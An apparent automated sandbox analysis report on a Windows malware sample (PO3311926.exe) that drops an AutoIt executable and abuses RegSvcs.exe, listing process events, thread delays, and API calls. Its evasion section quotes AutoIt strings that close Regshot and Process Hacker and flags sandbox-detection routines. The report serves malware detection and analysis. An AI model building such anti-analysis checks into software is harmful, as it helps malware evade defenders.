Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM autoit script

Source: Yara match	File source: Process Memory Space: sdadbtvsh.bin PID: 3232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sdadbtvsh.bin.exe PID: 6064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sdadbtvsh.bin.exe PID: 5308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: sdadbtvsh.bin.exe PID: 5924, type: MEMORYSTR

Found API chain indicative of sandbox detection

Source: C:\Users\user\wrse\sdadbtvsh.bin.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1597242290.0000000001734000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598263420.000000000175F000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1746432697.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1741924175.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1745908071.0000000000DE5000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1954471926.0000000001608000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1953466654.00000000015E3000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2205277299.0000000001793000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2206209315.0000000001795000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSHACKER.EXE
Source: sdadbtvsh.bin.exe, 00000014.00000002.1753079110.0000000000D78000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")P
Source: sdadbtvsh.bin.exe, 00000023.00000003.2205277299.0000000001793000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2206209315.0000000001795000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2208129774.00000000017B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXE1
Source: sdadbtvsh.bin.exe, 00000014.00000003.1752049133.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1664995772.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1664923329.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1744085917.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1745967153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")Y
Source: sdadbtvsh.bin.exe, 00000014.00000003.1746432697.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1741924175.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1745908071.0000000000DE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXEOWG
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1599241686.00000000016FB000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1502498229.00000000016E4000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598994724.00000000016F9000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1879240531.0000000001595000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1954085985.00000000015AB000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1955387014.00000000015AC000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1953788447.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2206401389.000000000175A000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2205465079.0000000001757000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, nngqrvwq.xl.0.dr, nngqrvwq.xl.8.dr	Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
Source: sdadbtvsh.bin.exe, 0000001A.00000002.1956682137.0000000001578000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")5*=
Source: sdadbtvsh.bin.exe, 00000023.00000003.2206401389.000000000175A000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2205465079.0000000001757000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2130760562.0000000001754000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2209331519.000000000175B000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2130668327.0000000001744000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000002.2210525293.000000000175D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THENKQ9UK
Source: PO3311926.exe, 00000000.00000003.1398209942.0000000006C44000.00000004.00000020.00020000.00000000.sdmp, nngqrvwq.xl.0.dr, nngqrvwq.xl.8.dr	Binary or memory string: PROCESSCLOSE("REGSHOT.EXE")
Source: sdadbtvsh.bin.exe, 0000001A.00000003.1954471926.0000000001608000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1953466654.00000000015E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXES=&.
Source: sdadbtvsh.bin, 00000008.00000002.1603220411.00000000016C8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")
Source: sdadbtvsh.bin.exe, 00000023.00000003.2205277299.0000000001793000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2206209315.0000000001795000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000023.00000003.2208129774.00000000017B8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXES,
Source: sdadbtvsh.bin, 00000008.00000003.1502556074.00000000016F5000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1502498229.00000000016E4000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598994724.00000000016F9000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1752049133.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1664995772.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1664923329.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000002.1753460451.0000000000DAD000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1744085917.0000000000DA7000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1745967153.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1879240531.0000000001595000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: IF PROCESSEXISTS("REGSHOT.EXE") THEN
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598450834.000000000175C000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1597242290.0000000001734000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598346984.000000000174F000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1746432697.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1741924175.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 00000014.00000003.1745908071.0000000000DE5000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXES
Source: sdadbtvsh.bin.exe, 00000023.00000002.2210346244.0000000001728000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")I
Source: sdadbtvsh.bin, 00000008.00000003.1596902108.0000000001733000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598450834.000000000175C000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1597242290.0000000001734000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin, 00000008.00000003.1598346984.000000000174F000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1954471926.0000000001608000.00000004.00000020.00020000.00000000.sdmp, sdadbtvsh.bin.exe, 0000001A.00000003.1953466654.00000000015E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: REGSHOT.EXE
Source: nngqrvwq.xl.0.dr, nngqrvwq.xl.8.dr	Binary or memory string: PROCESSCLOSE("PROCESSHACKER.EXE")

Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\RegSvcs.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Window / User API: threadDelayed 1014

Jump to behavior

Source: C:\Users\user\Desktop\PO3311926.exe

Evasive API call chain: GetLocalTime,DecisionNodes

graph_0-23555

Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	API coverage: 5.4 %
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	API coverage: 4.8 %

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\PO3311926.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BAA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_00BAA69B
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BBC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_00BBC220
Source: C:\Users\user\Desktop\PO3311926.exe	Code function: 0_2_00BCB348 FindFirstFileExA,	0_2_00BCB348
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005FE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	8_2_005FE387
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005FD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_005FD836
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005FDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_005FDB69
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_00609F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_00609F9F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_0060A0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_0060A0FA
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_0060A488 FindFirstFileW,Sleep,FindNextFileW,FindClose,	8_2_0060A488
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_006065F1 FindFirstFileW,FindNextFileW,FindClose,	8_2_006065F1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_005CC642 FindFirstFileExW,	8_2_005CC642
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_00607248 FindFirstFileW,FindClose,	8_2_00607248
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\sdadbtvsh.bin	Code function: 8_2_006072E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	8_2_006072E9
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00ACE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	20_2_00ACE387
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00ACD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	20_2_00ACD836
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00AD9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	20_2_00AD9F9F
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00ADA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	20_2_00ADA0FA
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00ADA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,	20_2_00ADA488
Source: C:\Users\user\wrse\sdadbtvsh.bin.exe	Code function: 20_2_00AD65F1 FindFirstFileW,FindNextFileW,FindClose,	20_2_00AD65F1
